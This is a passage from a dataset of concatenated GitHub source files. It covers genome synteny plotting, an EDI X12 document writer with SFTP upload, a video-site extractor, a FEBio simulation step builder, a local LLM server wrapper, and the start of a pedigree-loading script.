pruning)\".format(len(ef), len(ef_pruned)),\n file=sys.stderr,\n )\n extras.append(ef_pruned)\n\n maxspan = max(exts, key=lambda x: x[-1])[-1]\n scale = maxspan / CanvasSize\n\n self.gg = gg = {}\n self.rr = []\n ymids = []\n glyphcolor = (\n OrientationPalette()\n if glyphcolor == \"orientation\"\n else OrthoGroupPalette(bf.grouper())\n )\n for i in range(bf.ncols):\n ext = exts[i]\n ef = extras[i] if extras else None\n r = Region(\n root,\n ext,\n lo[i],\n bed,\n scale,\n switch,\n gene_labels=gene_labels,\n genelabelsize=genelabelsize,\n chr_label=chr_label,\n loc_label=loc_label,\n vpad=vpad,\n extra_features=ef,\n glyphstyle=glyphstyle,\n glyphcolor=glyphcolor,\n )\n self.rr.append(r)\n # Use tid and accn to store gene positions\n gg.update(dict(((i, k), v) for k, v in r.gg.items()))\n ymids.append(r.y)\n\n for i, j, blockcolor, samearc in lo.edges:\n ymid_pad = ymid_offset(samearc, pad)\n for ga, gb, h in bf.iter_pairs(i, j):\n a, b = gg[(i, ga)], gg[(j, gb)]\n Shade(\n root, a, b, ymid_pad, fc=blockcolor, lw=0, alpha=1, style=shadestyle\n )\n\n for ga, gb, h in bf.iter_pairs(i, j, highlight=True):\n a, b = gg[(i, ga)], gg[(j, gb)]\n Shade(\n root,\n a,\n b,\n ymid_pad,\n alpha=1,\n highlight=h,\n zorder=2,\n style=shadestyle,\n )\n\n if scalebar:\n print(\"Build scalebar (scale={})\".format(scale), file=sys.stderr)\n # Find the best length of the scalebar\n ar = [1, 2, 5]\n candidates = (\n [1000 * x for x in ar]\n + [10000 * x for x in ar]\n + [100000 * x for x in ar]\n )\n # Find the one that's close to an optimal canvas size\n dists = [(abs(x / scale - 0.12), x) for x in candidates]\n dist, candidate = min(dists)\n dist = candidate / scale\n x, y, yp = 0.22, 0.92, 0.005\n a, b = x - dist / 2, x + dist / 2\n lsg = \"lightslategrey\"\n root.plot([a, a], [y - yp, y + yp], \"-\", lw=2, color=lsg)\n root.plot([b, b], [y - yp, y + yp], \"-\", lw=2, color=lsg)\n root.plot([a, b], [y, y], \"-\", lw=2, color=lsg)\n root.text(\n x,\n y + 0.02,\n human_size(candidate, precision=0),\n ha=\"center\",\n va=\"center\",\n )\n\n if tree:\n from jcvi.graphics.tree import draw_tree, read_trees\n\n trees = read_trees(tree)\n ntrees = len(trees)\n logging.debug(\"A total of {0} trees imported.\".format(ntrees))\n xiv = 1.0 / ntrees\n yiv = 0.3\n xstart = 0\n ystart = min(ymids) - 0.4\n for i in range(ntrees):\n ax = fig.add_axes([xstart, ystart, xiv, yiv])\n label, outgroup, color, tx = trees[i]\n draw_tree(\n ax,\n tx,\n outgroup=outgroup,\n rmargin=0.4,\n leaffont=11,\n treecolor=color,\n supportcolor=color,\n leafcolor=color,\n )\n xstart += xiv\n RoundLabel(ax, 0.5, 0.3, label, fill=True, fc=\"lavender\", color=color)\n\n\ndef draw_gene_legend(\n ax,\n x1,\n x2,\n ytop,\n d=0.04,\n text=False,\n repeat=False,\n glyphstyle=\"box\",\n):\n forward, backward = OrientationPalette.forward, OrientationPalette.backward\n ax.plot([x1, x1 + d], [ytop, ytop], \":\", color=forward, lw=2)\n ax.plot([x1 + d], [ytop], \">\", color=forward, mec=forward)\n ax.plot([x2, x2 + d], [ytop, ytop], \":\", color=backward, lw=2)\n ax.plot([x2], [ytop], \"<\", color=backward, mec=\"g\")\n if text:\n ax.text(x1 + d / 2, ytop + d / 2, \"gene (+)\", ha=\"center\")\n ax.text(x2 + d / 2, ytop + d / 2, \"gene (-)\", ha=\"center\")\n if repeat:\n xr = (x1 + x2 + d) / 2\n Glyph(\n ax,\n xr - d / 2,\n xr + d / 2,\n ytop,\n 0.012 * 3 / 4,\n gradient=False,\n fc=\"#ff7f00\",\n style=glyphstyle,\n zorder=2,\n )\n ax.text(xr, ytop + d / 2, \"repeat\", ha=\"center\")\n\n\ndef main():\n p = OptionParser(__doc__)\n 
p.add_option(\"--switch\", help=\"Rename the seqid with two-column file\")\n p.add_option(\"--tree\", help=\"Display trees on the bottom of the figure\")\n p.add_option(\"--extra\", help=\"Extra features in BED format\")\n p.add_option(\n \"--genelabels\",\n help='Show only these gene labels, separated by comma. Example: \"At1g12340,At5g54690\"',\n )\n p.add_option(\n \"--genelabelsize\",\n default=0,\n type=\"int\",\n help=\"Show gene labels at this font size, useful for debugging. \"\n + \"However, plot may appear visually crowded. \"\n + \"Reasonably good values are 2 to 6 [Default: disabled]\",\n )\n p.add_option(\n \"--scalebar\",\n default=False,\n action=\"store_true\",\n help=\"Add scale bar to the plot\",\n )\n p.add_option(\n \"--glyphstyle\",\n default=\"box\",\n choices=Glyph.Styles,\n help=\"Style of feature glyphs\",\n )\n p.add_option(\n \"--glyphcolor\",\n default=\"orientation\",\n choices=Glyph.Palette,\n help=\"Glyph coloring based on\",\n )\n p.add_option(\n \"--shadestyle\",\n default=\"curve\",\n choices=Shade.Styles,\n help=\"Style of syntenic wedges\",\n )\n opts, args, iopts = p.set_image_options(figsize=\"8x7\")\n\n if len(args) != 3:\n sys.exit(not p.print_help())\n\n datafile, bedfile, layoutfile = args\n switch = opts.switch\n tree = opts.tree\n gene_labels = None if not opts.genelabels else set(opts.genelabels.split(\",\"))\n\n pf = datafile.rsplit(\".\", 1)[0]\n fig = plt.figure(1, (iopts.w, iopts.h))\n root = fig.add_axes([0, 0, 1, 1])\n Synteny(\n fig,\n root,\n datafile,\n bedfile,\n layoutfile,\n switch=switch,\n tree=tree,\n extra_features=opts.extra,\n gene_labels=gene_labels,\n genelabelsize=opts.genelabelsize,\n scalebar=opts.scalebar,\n shadestyle=opts.shadestyle,\n glyphstyle=opts.glyphstyle,\n glyphcolor=opts.glyphcolor,\n seed=iopts.seed,\n )\n\n root.set_xlim(0, 1)\n root.set_ylim(0, 1)\n root.set_axis_off()\n\n image_name = pf + \".\" + iopts.format\n savefig(image_name, dpi=iopts.dpi, iopts=iopts)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tanghaibao/jcvi","sub_path":"jcvi/graphics/synteny.py","file_name":"synteny.py","file_ext":"py","file_size_in_byte":20888,"program_lang":"python","lang":"en","doc_type":"code","stars":634,"dataset":"github-code","pt":"78"} +{"seq_id":"42489049632","text":"import os\nimport datetime\nfrom typing import List, Dict, Union\nfrom pandas.tseries.offsets import BDay\nfrom .sftp import SFTP\n\n\"\"\"\n 855 APK paylaod \n\n ISA:Authorization Information Qualifier, \n Authorization Information,\n Security Information Qualifier, \n Security Information.\n Interchange ID Qualifier, \n Interchange Sender ID,\n Interchange ID Qualifier, \n Interchange Receiver ID,\n Interchange Date, \n Interchange Time,\n Interchange Control Standards Identifier, \n Interchange Control Version Number,\n Interchange Control Number, \n Acknowledgment Requested,\n Usage Indicator,\n Component Element Separator,\n\n GS: Functional Identifier Code\n Application Sender's Code\n Application Receiver's Code\n Date\n Time\n Group Control Number\n Responsible Agency Code\n Version / Release / Industry Identifier Code\n \n ST: Transaction Set Identifier Code\n Transaction Set Control Number\n\n BAK:Transaction Set Purpose Code (\n 06: Confirmation\n )\n Acknowledgment Type (\n AC: Acknowledge - With Detail and Change\n AD: Acknowledge - With Detail, No Change\n AE: Acknowledge - With Exception Detail Only\n AT: Accepted\n RD: Reject with Detail\n )\n Purchase Order Number\n Date (YYYYMMDD)\n Release Number\n Reference 
Identification\n Date (YYYYMMDD)\n\n BSN:Transaction Set Purpose Code (\n 00: Original, \n 14: Advance Notification\n )\n Shipment Identification\n Date\n Time\n Hierarchical Structure Code (\n 0004 : Shipment, Order, Item\n )\n\n DTM:Date/Time Qualifier (\n 002 Delivery Requested\n 010 Requested Ship\n 017 Estimated Delivery\n 069 Promised for Delivery\n )\n Date (YYYYMMDD)\n\n ---- LOOP Loop Hierarchical Level ----\n HL: Hierarchical Level (\n Hierarchical ID Number,\n Hierarchical Parent ID Number,\n Hierarchical Level Code\n )\n REF:Reference Identification (\n Reference Identification Qualifier (\n BM: Bill of Lading Number\n CN: Carrier's Reference Number (PRO/Invoice)\n MB: Master Bill of Lading\n PK: Packing List Number\n ZZ: Mutually Defined\n )\n )\n PER:Administrative Communications Contact\n DTM:Date/Time Reference\n\n ---- LOOP Loop Reference Identification ----\n N9: Reference Identification Qualifier\n Reference Identification\n\n MSG:Free-Form Message Text\n\n ---- LOOP Addresses ----\n N1: Name (\n Entity Identifier Code (\n BT: Bill-to-Party\n ST: Ship To\n VN: Vendor\n )\n Identification Code Qualifier (\n 91: Assigned by Seller or Seller's Agent\n 92: Assigned by Buyer or Buyer's Agent\n ZZ: Mutually Defined\n )\n Identification Code\n )\n\n N2: Additional Name Information (\n Name\n Name\n )\n\n N3: Address Information (\n Address Information\n Address Information\n )\n\n N4: Geographic Location (\n City Name\n State or Province Code\n Postal Code\n Country Code\n )\n\n ---- LOOP ITEMS ----\n PO1:Assigned Identification\n Quantity Ordered\n Unit or Basis for Measurement Code (CA: Case, EA: Each)\n Unit Price\n Product/Service ID Qualifier (\n VC: Vendor's (Seller's) Catalog Number\n VN: Vendor's (Seller's) Item Number\n )\n Product/Service ID\n \n PID:Item Description Type (F: Free-form)\n Description\n \n ACK:Line Item Status Code (\n AC: Item Accepted and Shipped\n AR: Item Accepted and Released for Shipment\n BP: Item Accepted - Partial Shipment, Balance Backordered\n IA: Item Accepted\n IB: Item Backordered\n IC: Item Accepted - Changes Made\n ID: Item Deleted\n IF: Item on Hold, Incomplete Description\n IP: Item Accepted - Price Changed\n IQ: Item Accepted - Quantity Changed\n IR: Item Rejected\n IS: Item Accepted - Substitution Made\n R1: Item Rejected, Not a Contract Item\n R2: Item Rejected, Invalid Item Product Number\n R3: Item Rejected, Invalid Unit of Issue\n R4: Item Rejected, Contract Item not Available\n )\n Quantity\n Unit or Basis for Measurement Code (\n CA: Case\n EA: Each\n )\n Date/Time Qualifier (\n 017 Estimated Delivery\n 068 Current Schedule Ship\n )\n Date (YYYYMMDD)\n Product/Service ID Qualifier (\n VC: Vendor's (Seller's) Catalog Number\n VN: Vendor's (Seller's) Item Number\n )\n Product/Service ID\n\n CTT:Number of Line Items\n \n SE: Number of Included Segments, \n Transaction Set Control Number\n \n GE: Number of Transaction Sets Included, \n Group Control Number\n\n IEA:Number of Included Functional Groups, \n Interchange Control Number\n\n\"\"\"\nclass Writer(SFTP):\n\n def __init__(self, reader=None, sap=None) -> None:\n super().__init__()\n self.reader = reader\n self.sap = sap\n self.now = datetime.datetime.now()\n self.date = self.now.strftime('%y%m%d')\n self.fulldate = self.now.strftime('%Y%m%d')\n self.time = self.now.strftime('%H%M')\n\n self.document_type = ''\n\n self.document_header = {}\n self.document_lines = []\n self.document_footer = {}\n\n self.doyon = 'DOYONSDESPRES '\n self.receiver_id = ''\n\n 
self.interchange_id_qualifier = 'ZZ'\n self.interchange_ctrl_version = '00401'\n self.interchange_ctrl_number = '000000001'\n self.group_control = \"00001\"\n self.transaction_ctrl_number = '000000001'\n\n self.id_code_qualifier = '91'\n\n self.order_document = self.reader.get_document()\n self.order_lines = self.reader.get_lines()\n self.receiver_id = self.reader.header[0][6]\n self.ship_to = self.reader.get_ship_to()\n self.bill_to = self.reader.get_bill_to()\n self.related_po = self.order_document['reference']\n self.ref_order = self.order_document['po_ref']\n \n self.functional_id = 'PR'\n self.date_time_id = '011'\n\n if hasattr(self.reader, \"filename\"):\n self.filename = self.reader.filename\n \n def get_ISA(self) -> List:\n return [\n 'ISA', \n '00', # Authorization Information Qualifier\n ' ', # Authorization Information\n '00', # Security Information Qualifier\n ' ', # Security Information\n f'{self.interchange_id_qualifier}', # Interchange ID Qualifier\n f'{self.doyon}'.ljust(15), # Interchange Sender ID\n f'{self.interchange_id_qualifier}', # Interchange ID Qualifier\n f'{self.receiver_id}'.ljust(15), # Interchange Receiver ID\n f'{self.date}', # Interchange Date\n f'{self.time}', # Interchange Time\n 'U', # Interchange Control Standards Identifier\n f'{self.interchange_ctrl_version}', # Interchange Control Version Number\n f'{self.interchange_ctrl_number}', # Interchange Control Number\n '0', # Acknowledgment Requested\n 'P', # Usage Indicator\n '|' # Component Element Separator\n ]\n\n def get_GS(self) -> List:\n return [\n \"GS\",\n f\"{self.functional_id}\", # Functional Identifier Code\n f'{self.doyon}', # Application Sender's Code\n f'{self.receiver_id}'.strip(' '), # Application Receiver's Code\n f'{self.fulldate}', # Date\n f'{self.time}', # Time\n f\"{self.group_control}\".strip(\"0\"), # Group Control Number\n \"X\", # Responsible Agency Code\n f'{self.interchange_ctrl_version}0', # Version / Release / Industry Identifier Code\n ]\n\n def get_ST(self) -> List:\n return [\n \"ST\",\n f\"{self.document_type}\", # Transaction Set Identifier Code\n f\"{self.transaction_ctrl_number[-4:]}\" # Transaction Set Control Number\n ]\n\n def get_BIG(self) -> List:\n return [\n \"BIG\",\n f\"{self.sap['doc']['DocDate'].strftime('%Y%m%d')}\",\n f\"{self.sap['doc']['DocNum']}\",\n f\"{self.fulldate}\",\n f\"{self.sap['doc']['NumAtCard']}\",\n '', '',\n \"DI\",\n ]\n \n def get_CUR(self) -> List:\n return [\"CUR\", \"SE\", \"CAD\"]\n\n def get_REF(self) -> List:\n document = self.reader.get_document()\n return [\n \"REF\",\n \"PK\",\n f\"{self.sap['doc']['DocNum']}\",\n ]\n\n def get_PER(self) -> List:\n return [\n \"PER\",\n \"DI\",\n f\"{self.sap['doc']['SlpName']}\",\n f\"EM\",\n f\"{self.sap['doc']['SlpEmail']}\",\n ]\n \n def get_BSN(self) -> List:\n return [\n \"BSN\",\n \"00\", # Transction Set Purpose Code (00 - Original, 14 - Advance Notification)\n f\"{self.sap['doc']['DocNum']}\", # Shipment Identification\n f\"{self.fulldate}\", # Date YYYYMMDD\n f\"{self.time}\", # Time HHMM\n \"0004\", # Hierarchical Structure Code\n ]\n\n def get_HL(self) -> List:\n return [\"HL\",\"1\",\"\",\"S\"]\n\n def get_BAK(self) -> List:\n return [\n \"BAK\",\n \"06\", # Transaction Set Purpose Code\n \"AC\", # Acknowledgment Type\n f\"{self.sap['doc']['NumAtCard']}\", # Purchase Order Number\n f'{self.order_document[\"date\"]}', # Date / is the date assigned by the purchaser to purchase order\n #\"\", # Release Number\n #f\"{self.ref_order[:-3]}\", # Reference Identification\n 
#f'{self.fulldate}', # Date\n ]\n\n def get_DTM(self) -> List:\n return [\n \"DTM\",\n f\"{self.date_time_id}\", # Date/Time Qualifier\n f'{self.fulldate}', # Date\n ]\n\n def get_N_loop(self) -> Dict:\n return {\n 'N1_ST': [\n 'N1',\n 'ST', # Entity Identifier Code\n f'{self.ship_to[\"name\"][:59]}', # Name\n f\"{self.id_code_qualifier}\", # Identification Code Qualifier\n f'{self.ship_to[\"code\"]}', # Identification Code\n ],\n 'N1_BT': [\n 'N1',\n 'BT', # Entity Identifier Code\n f'{self.bill_to[\"name\"][:59]}', # Name\n f\"{self.id_code_qualifier}\", # Identification Code Qualifier\n f'{self.bill_to[\"code\"]}', # Identification Code\n ],\n 'N1_VN': [\n 'N1', \n 'VN', # Entity Identifier Code\n 'DOYONDESPRES', # Name\n f\"{self.id_code_qualifier}\", # Identification Code Qualifier\n 'DOYONDESPRES', # Identification Code\n ]\n }\n \n def get_ITD(self) -> List:\n return [\n 'ITD',\n '01',\n '3',\n '',\n f\"{self.sap['doc']['DocDueDate'].strftime('%Y%m%d')}\",\n ]\n \n def get_CTT(self) -> List:\n return ['CTT', f'{len(self.document_lines)}']\n\n def get_SE(self) -> List:\n str_count = len([x for x in self.document_header if x not in ['ISA', 'GS']])\n for line in self.document_lines:\n str_count += len(line)\n str_count += 2\n return ['SE', f'{str_count}', f'{self.transaction_ctrl_number[-4:]}']\n\n def get_GE(self) -> List:\n return ['GE', f\"{self.group_control}\".strip(\"0\"), f\"{self.group_control}\".strip(\"0\")]\n\n def get_IEA(self) -> List:\n return ['IEA', '1', f'{self.interchange_ctrl_number}']\n\n # Overrided function\n def build_header(self) -> None:\n pass\n\n # Overrided function\n def build_lines(self):\n pass\n\n # Overrided function\n def build_footer(self) -> None:\n self.document_footer = {\n 'CTT': self.get_CTT(),\n 'SE': self.get_SE(),\n 'GE': self.get_GE(),\n 'IEA': self.get_IEA()\n }\n\n def create(self, transfert=False):\n self.build_header()\n self.build_lines()\n self.build_footer()\n\n _rtn = []\n for prop in [self.document_header, *self.document_lines, self.document_footer]:\n for key, val in prop.items():\n _rtn.append(\"*\".join(val))\n str_return = \"~\\n\".join(_rtn)\n if str_return[-1] != \"~\":\n str_return += \"~\"\n \n path = f\"{self.local_upload_path}/{self.filename}-{self.document_type}-{self.sap['doc']['DocNum']}\"\n try:\n os.remove(path)\n except:\n pass\n file = open(path, 'a', encoding=\"ISO-8859-1\")\n file.write(str_return)\n file.close()\n if transfert:\n send_report = self.upload_files()\n else:\n send_report = None\n\n return str_return, send_report\n\n def get_document(self) -> List:\n _rtn = []\n for prop in [self.document_header, *self.document_lines, self.document_footer]:\n for key, val in prop.items():\n _rtn.append(val)\n return _rtn\n\n def get_order_line_by_item_code(self, item_code) -> dict:\n order_line = None\n order_line = list(filter(lambda x: (x['code'] == item_code), self.order_lines))\n if order_line:\n return order_line[0]\n raise Exception('Order Line not found')\n\n ","repo_name":"pygauthier/code_exemple","sub_path":"edi/writer.py","file_name":"writer.py","file_ext":"py","file_size_in_byte":14124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33057966256","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nimport re\n\nfrom .common import InfoExtractor\nfrom ..utils import (\n ExtractorError,\n)\n\n\nclass EynyBaseIE(InfoExtractor):\n IE_DESC = False # Do not list\n\n\nclass EynyIE(EynyBaseIE):\n IE_NAME = 'eyny'\n _VALID_URL = 
r'https?:\\/\\/(?:www\\.)?eyny\\.com\\/\\d+\\/watch\\?v=(?P[^#?&]+)(?:&[^&]+)*'\n _TEST = {}\n _TITLE_REGEX = re.compile(r'(?ms)(.+) - Free Videos \\& Sex Movies - XXX Tube - EYNY<\\/title>')\n\n def _real_extract(self, url):\n video_id = self._match_id(url)\n webpage = self._download_webpage(url, video_id)\n\n title = self._TITLE_REGEX.search(webpage).group(1)\n\n entries = self._parse_html5_media_entries(url, webpage, video_id, m3u8_id='hls')\n if not entries:\n raise ExtractorError('Private video', expected=True)\n entry = entries[0]\n self._sort_formats(entry['formats'])\n entry.update({\n 'id': video_id,\n 'title': title,\n 'age_limit': 18,\n })\n return entry\n","repo_name":"ytdl-patched/ytdl-patched","sub_path":"yt_dlp/extractor/eyny.py","file_name":"eyny.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":429,"dataset":"github-code","pt":"78"} +{"seq_id":"39045898118","text":"# -*- coding:utf-8 -*-\n# @Time: 7/5/22 2:14 μ.μ.\n# @Author: kostas\n# @Email: krisvas@ece.upatras.gr\n# @Filename: step.py\nimport copy\nimport xml.etree.ElementTree as ET\n\n__doc__ = \"Step submodule to add control steps.\"\n__all__ = [\"Step\"]\n\n\nclass Step:\n\t\"\"\"\n\t \"Build an instance of object Control\n\t\"\"\"\n\n\tdef __init__(self, model):\n\t\t\"\"\"\n\t\tConstructor\n\n\t\tParameters\n\t\t----------\n\t\tmodel: an initialized febio_exporter model\n\t\t\"\"\"\n\t\tself.parent = model\n\t\tself.step_counter = 1\n\t\tself.step = None\n\t\tself.root = None\n\t\tself.control = None\n\t\tself.loadcurve_id = None\n\t\tself.initial = None\n\n\tdef add_step(self, name, parameters, use_must_point=False,\n\t\t\t\t restart_step=False,\n\t\t\t\t add_init_prestrain=False):\n\t\t\"\"\"Adds a step according to the dictionary format.\n\n\t\tParameters\n\t\t----------\n\n\t\tparameters: [dictionary] parameters of the step\n\n\t\tuse_must_point: [boolean] whether to use must points in the time\n\t\t\t\t\t\tstepper\n\t\trestart_step: [boolean] whether to use the restart capablity\n\t\tadd_init_prestrain: [boolean] add initial prestraint sectrion in case\n\t\t\t\t\t\t\tthe prestrain plugin is used\n\n\t\tReturns\n\t\t-------\n\n\t\tstep: [ET.SubElement] the step xml root\n\n\t\tloadcurve_id: [integer] (default None) the must point loadcurve_id\n\t\t\"\"\"\n\n\t\tif self.step_counter > 1:\n\t\t\tif self.parent.step is None:\n\t\t\t\tself.step = ET.SubElement(self.parent.root, 'Step')\n\t\t\tif not restart_step:\n\t\t\t\tself.root = ET.SubElement(\n\t\t\t\t\tself.step, 'step',\n\t\t\t\t\tattrib={'id': str(self.parent.loadcurve_id + 1),\n\t\t\t\t\t\t\t'name': name})\n\t\t\telse:\n\t\t\t\t# TODO implement restart step\n\t\t\t\t# raise RuntimeError(\"Not implemented yet! 
\")\n\t\t\t\tself.root = ET.SubElement(self.parent.root, 'Step',\n\t\t\t\t\t\t\t\t\t\t attrib={'type': 'solid'})\n\t\t\tself.control = ET.SubElement(self.root, 'Control')\n\t\telse:\n\t\t\tif self.parent.control is None:\n\t\t\t\tself.parent.control = ET.SubElement(\n\t\t\t\t\tself.parent.root, 'Control')\n\t\t\tself.control = self.parent.control\n\t\t\tself.root = self.control\n\n\t\tif add_init_prestrain:\n\t\t\tself.initial = ET.SubElement(self.root, 'Initial')\n\t\tfor key, value in parameters.items():\n\t\t\tif key == 'time_stepper':\n\t\t\t\ttime_stepper = ET.SubElement(self.control, key)\n\t\t\t\tfor sub_key, sub_value in value.items():\n\t\t\t\t\tif use_must_point and sub_key == 'dtmax':\n\t\t\t\t\t\titem = ET.SubElement(\n\t\t\t\t\t\t\ttime_stepper, sub_key,\n\t\t\t\t\t\t\tattrib={'lc': str(self.parent.loadcurve_id + 1)})\n\t\t\t\t\t\t# item.text = ''\n\t\t\t\t\t\tself.loadcurve_id = self.parent.loadcurve_id + 1\n\t\t\t\t\t\tself.parent.loadcurve_id += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\titem = ET.SubElement(time_stepper, sub_key)\n\t\t\t\t\t\titem.text = str(sub_value)\n\t\t\telif key == 'analysis':\n\t\t\t\titem = ET.SubElement(self.control, key)\n\t\t\t\titem.text = value.upper()\n\t\t\telif key == 'restart':\n\t\t\t\titem = ET.SubElement(self.control, key)\n\t\t\t\titem.text = str(1)\n\t\t\t\titem.set('file', value)\n\t\t\telif key == 'initial':\n\t\t\t\titem = ET.SubElement(self.initial, 'ic',\n\t\t\t\t\t\t\t\t\t attrib={'type': 'prestrain'})\n\t\t\t\titem1 = ET.SubElement(item, 'init')\n\t\t\t\titem1.text = str(value['init'])\n\t\t\t\titem2 = ET.SubElement(item, 'reset')\n\t\t\t\titem2.text = str(value['reset'])\n\t\t\telif key == 'solver':\n\t\t\t\tsolver = ET.SubElement(self.control, key)\n\t\t\t\tfor sub_key, sub_value in value.items():\n\t\t\t\t\tsubitem = ET.SubElement(solver, sub_key)\n\t\t\t\t\tsubitem.text = str(sub_value)\n\t\t\telse:\n\t\t\t\titem = ET.SubElement(self.control, key)\n\t\t\t\titem.text = str(value)\n\n\t\treturn self.root, self.loadcurve_id\n\n\tdef add_restart_step(self, name, parameters, use_must_point=False):\n\t\t\"\"\"\n\t\tFunction that adds a step to the restart file\n\t\tReturns\n\t\t-------\n\n\t\t\"\"\"\n\t\tif self.step_counter > 1:\n\t\t\tif self.parent.step is None:\n\t\t\t\tself.step = ET.SubElement(self.parent.root, 'Step')\n\n\t\t\telse:\n\t\t\t\tself.step = self.parent.step\n\n\t\t\tself.root = ET.SubElement(self.step, 'step',\n\t\t\t\t\t\t\t\t\t attrib={'id': str(\n\t\t\t\t\t\t\t\t\t\t self.parent.loadcurve_id + 1),\n\t\t\t\t\t\t\t\t\t\t\t 'name': name,\n\t\t\t\t\t\t\t\t\t\t\t 'type': \"solid\"})\n\t\t\tself.control = ET.SubElement(self.root, 'Control')\n\n\t\tfor key, value in parameters.items():\n\t\t\tif key == 'time_stepper':\n\t\t\t\ttime_stepper = ET.SubElement(self.control, key)\n\t\t\t\tfor sub_key, sub_value in value.items():\n\t\t\t\t\tif use_must_point and sub_key == 'dtmax':\n\t\t\t\t\t\titem = ET.SubElement(\n\t\t\t\t\t\t\ttime_stepper, sub_key,\n\t\t\t\t\t\t\tattrib={'lc': str(self.parent.loadcurve_id + 1)})\n\t\t\t\t\t\t# item.text = ''\n\t\t\t\t\t\tself.loadcurve_id = self.parent.loadcurve_id + 1\n\t\t\t\t\t\tself.parent.loadcurve_id += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\titem = ET.SubElement(time_stepper, sub_key)\n\t\t\t\t\t\titem.text = str(sub_value)\n\t\t\telif key == 'analysis':\n\t\t\t\titem = ET.SubElement(self.control, key)\n\t\t\t\titem.text = value.upper()\n\t\t\telif key == 'restart':\n\t\t\t\titem = ET.SubElement(self.control, key)\n\t\t\t\titem.text = str(1)\n\t\t\t\titem.set('file', value)\n\t\t\telif key == 
'initial':\n\t\t\t\titem = ET.SubElement(self.initial, 'ic',\n\t\t\t\t\t\t\t\t\t attrib={'type': 'prestrain'})\n\t\t\t\titem1 = ET.SubElement(item, 'init')\n\t\t\t\titem1.text = str(value['init'])\n\t\t\t\titem2 = ET.SubElement(item, 'reset')\n\t\t\t\titem2.text = str(value['reset'])\n\t\t\telif key == 'solver':\n\t\t\t\tsolver = ET.SubElement(self.control, key)\n\t\t\t\tfor sub_key, sub_value in value.items():\n\t\t\t\t\tsubitem = ET.SubElement(solver, sub_key)\n\t\t\t\t\tsubitem.text = str(sub_value)\n\t\t\telse:\n\t\t\t\titem = ET.SubElement(self.control, key)\n\t\t\t\titem.text = str(value)\n\n\t\treturn self.root, self.loadcurve_id\n\n\t@staticmethod\n\tdef get_default_step_parameters():\n\t\t\"\"\"Gets the default step parameters.\n\n\t\tReturns\n\t\t-------\n\n\t\tparameters: [dictionary]\n\n\t\t\"\"\"\n\t\treturn copy.copy({\n\t\t\t'analysis': 'static',\n\t\t\t'time_steps': 20,\n\t\t\t'step_size': 0.05,\n\t\t\t'solver': {\n\t\t\t\t'max_refs': 25,\n\t\t\t\t# 'max_refs': 15,\n\t\t\t\t'max_ups': 0,\n\t\t\t\t'diverge_reform': 1,\n\t\t\t\t'reform_each_time_step': 1,\n\t\t\t\t'dtol': 0.01,\n\t\t\t\t'etol': 0.1,\n\t\t\t\t'rtol': 0,\n\t\t\t\t'lstol': 0.9,\n\t\t\t\t'min_residual': 0.001,\n\t\t\t\t'qnmethod': 'BROYDEN',\n\t\t\t\t'rhoi': -2,\n\t\t\t\t'symmetric_stiffness': 0,\n\t\t\t},\n\t\t\t'time_stepper': {\n\t\t\t\t'dtmin': 0.00000001,\n\t\t\t\t'dtmax': 0.05,\n\t\t\t\t'max_retries': 30,\n\t\t\t\t'opt_iter': 10,\n\t\t\t\t# 'aggressiveness': 0\n\t\t\t}\n\t\t\t# 'alpha': 1,\n\t\t\t# 'beta': 0.25,\n\t\t\t# 'gamma': 0.5\n\t\t})\n","repo_name":"konris87/febio_exporter","sub_path":"febio_exporter/step.py","file_name":"step.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"36235464063","text":"import logging\n\n# Import the ibm-generative-ai library and local server extension\nfrom genai.extensions.localserver import CustomModel, LocalLLMServer\nfrom genai.model import Model\nfrom genai.schemas import GenerateParams, GenerateResult, TokenizeResult, TokenParams\nimport torch\n\nprint(torch.cuda.is_available())\n# This example uses the transformers library, please install using:\n# pip install transformers torch sentencepiece\ntry:\n from transformers import T5ForConditionalGeneration, T5Tokenizer, AutoModelForCausalLM, AutoTokenizer\nexcept ImportError:\n raise ImportError(\n \"\"\"\nCould not import transformers which is needed for this example.\nPlease install using: pip install transformers torch sentencepiece\n\"\"\"\n )\n\n\nlogger = logging.getLogger(__name__)\n\n# Create your custom model\n\n\nclass FlanT5Model(CustomModel):\n model_id = \"mistralai/Mistral-7B-Instruct-v0.1\"\n\n def __init__(self):\n model_id = \"mistralai/Mistral-7B-Instruct-v0.1\"\n logger.info(\"Initialising my custom flan-t5-base model\")\n self.tokenizer = AutoTokenizer.from_pretrained(model_id)\n self.model = AutoModelForCausalLM.from_pretrained(model_id, resume_download=True)\n logger.info(\"flan-t5-base is ready!\")\n\n def generate(self, input_text: str, params: GenerateParams) -> GenerateResult:\n logger.info(f\"Calling generate on: {input_text}\")\n input_ids = self.tokenizer(input_text, return_tensors=\"pt\").input_ids\n response = self.model.generate(input_ids, max_new_tokens=params.max_new_tokens)\n\n genai_response = GenerateResult(\n generated_text=self.tokenizer.decode(response[0]),\n generated_token_count=response.shape[1],\n input_token_count=input_ids.shape[1],\n stop_reason=\"\",\n )\n 
logger.info(f\"Response to {input_text} was: {genai_response}\")\n\n return genai_response\n\n def tokenize(self, input_text: str, params: TokenParams) -> TokenizeResult:\n logger.info(f\"Calling tokenize on: {input_text}\")\n tokenised = self.tokenizer(input_text).input_ids\n tokens = self.tokenizer.convert_ids_to_tokens(tokenised)\n result = TokenizeResult(token_count=len(tokens))\n if params.return_tokens is True:\n result.tokens = tokens\n return result\n","repo_name":"adam-pawelek/llm-chat-bot","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21828760181","text":"import os\nimport sys\nimport argparse\nimport gzip\n\nCHRS_INCLUDE=set(['1','2','3','4','5','6','7','8','9','10',\n '11','12','13','14','15',\n '16','17','18','19','20',\n '21','22','X'])\n\ndef main():\n args = parse_args()\n print(\"loading genders from sampleped file...\")\n sampleped_fh = open(args.sampleped_file, \"r\")\n genders = dict()\n for line in sampleped_fh:\n data = line.rstrip().split()\n genders[ data[1] ] = int( data[4] )\n sampleped_fh.close()\n\n print(\"loading parent .lis 